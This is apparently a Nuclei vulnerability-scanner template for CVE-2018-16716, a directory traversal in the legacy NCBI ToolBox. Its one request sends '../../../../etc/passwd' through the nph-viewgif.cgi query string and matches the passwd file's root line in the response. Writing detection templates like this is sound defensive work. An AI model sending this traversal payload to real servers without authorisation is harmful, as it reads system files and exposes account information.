nuclei-templates/cves/2018/CVE-2018-16716.yaml

33 lines
958 B
YAML

id: CVE-2018-16716
info:
name: NCBI ToolBox - Directory Traversal
author: 0x_Akoko
severity: high
description: A path traversal vulnerability exists in viewcgi.c in the 2.0.7 through 2.2.26 legacy versions of the NCBI ToolBox, which may result in reading of arbitrary files (i.e., significant information disclosure)
or file deletion via the nph-viewgif.cgi query string.
reference:
- https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md
- https://nvd.nist.gov/vuln/detail/CVE-2018-16716
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-16716
cwe-id: CWE-22
tags: cve,cve2018,ncbi,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200